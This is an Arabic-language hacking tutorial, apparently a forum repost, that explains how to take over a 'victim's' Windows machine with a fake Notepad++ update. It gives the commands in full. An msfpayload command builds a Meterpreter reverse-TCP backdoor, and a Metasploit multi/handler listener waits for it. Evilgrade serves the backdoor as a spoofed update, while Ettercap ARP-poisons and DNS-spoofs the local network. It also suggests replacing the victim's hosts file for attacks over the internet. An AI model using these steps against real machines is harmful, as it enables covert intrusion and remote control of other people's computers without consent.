اختراق نظام ويندوز عن طريق تحديث ملغم

[MATRIX ALGERIA]

بسم الله الرحمان الرحيم
اليوم
سنقوم في هذا الاختراق بعمل تحديث وهمي وارساله الى برنامج على جهاز الضحية
البرامج التى يمكن تزييف تحديثاتها:
·sunjava
·winzip
·winamp
·itunes
·speedbit
·openoffice
·linkedin
·osx
·notepadplus
·dap
في هذا الشرح سنستخدم برنامج notepad++
و ستكون طريقة العمل كالاتي :
1.نقوم بتكوين Backdoor باستخدام مشروع ميتاسبلويت بالخيارات التي تناسبنا.
2.استخدام مشروع Evilgrade الذي سيقوم بتشغيل Web Server يحتوي على تحديث مزيّف لبرنامج Notepad++.
3.استخدام برنامج Ettercap لعمل dns spoofing و بالتالي تحويل أي طلب مرسل لموقع Notepad++ الى الويب سيرفر الذي قام Evilgrade بتشغيله.(اذا كنا متصلين بالضحية عن طريق الشبكة المحلية)
و اذا كنا متصلين بها عن طريق الانترنت فعلينا تغيير ملف hosts
الموجود بمسارC:\Windows\System32\drivers\etc
على جهاز الضحية (سنتطرق الى هذا لاحقا)
لنبدء الشرح (ساستخدم نظام لينكس في الشرح )
نفتح شيل ونكتب الامر

/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port X > agent.exe

حيث
Metasploit: مسار برنامج ميتاسبلويت
Reverse_tcp:لاختيار الاتصال العكسي
ip:ايبي جهازك
PORT:البورت
Agent.exe:اسم الباكدور (اتركه كما هو)
الان كوننا الباك دور نقوم بنقله الى برنامج evilgrade
بالامر:

cp agent.exe /pentest/evilgrade/agent

حيث pentest هو مسار البرنامج
سيسئلك اذا كنت تريد استبدال الباكدور بالباكدور الذي ياتي مع البرنامج اجب بنعم
الان نقوم بالتنصت على البورت الذي اخترناه بالامر

/metasploit/msfconsole

حيث
Metasploit: مسار برنامج ميتاسبلويت

Use exploit/multi/handler
set LHOST=ip

ip:ايبي جهازك

set LPORT=port

PORT:البورت

set payload windows/meterpreter/reverse_tcp
exploit

تم التنصت الان نشغل evilgrade
نفتح شيل جديد و نكتب

Cd /pentest/evilgrade
./evilgrade
Conf notepadplus
Show option

الان نسجل قيمة ال virtual host و هي notepad-plus.sourceforge.net
ذلك هو الدومين الذي سنستعمله ثم نشغل السيرفر بالامر

Start

كل شيئ تمام ماعلينا الان الى عمل ال دي ا ناس سبوفينق

نفتح شيل جديد نحول صلاحيتنا الى رووت

Su root

نفعل ip forwarding :

Echo 1 > proc/sys/net/ipv4/ip_forward

نفتح etter.dns

Nano /usr/ettercap/etter.dns

حيث usr : مسار البرنامج
نغيير www.microsoft.com الى notepad-plus.sourceforge.net
و الايبي المقابل الى ايبي جهازنا نحفظ التغييرات و نخرج
نكتب الامر

// Ettercap –T –q –M arp:remote –P dns_spoof –i eth0

حيث eth0هو ال interface
تم الامر الان حينما تفتح الضحية برنامج notepadplus ستفتح له نافذة تخبره بوجود تحديثات وحينما يوافق على التحديث سيتم تنزيل الباكدور و تشغيله على جهاز الضحية و عليك الاختراق
هذا بالنسبة للوكال وبالنسبة للانترنت الحل هو اضافة الدومين وال ايبي الى ملف hosts

ثم استبداله في جهاز الضحية (من الافضل الاكتفاء بهذا الاختراق في الشبكات المحلية)
تحميل : http://www.infobyte.com.ar/developments.htmlevilgrade
تحميل : http://www.ettercap.sourceforge.net ettercap
تحميل :http://www.metasploit.com metasploit


منقول : )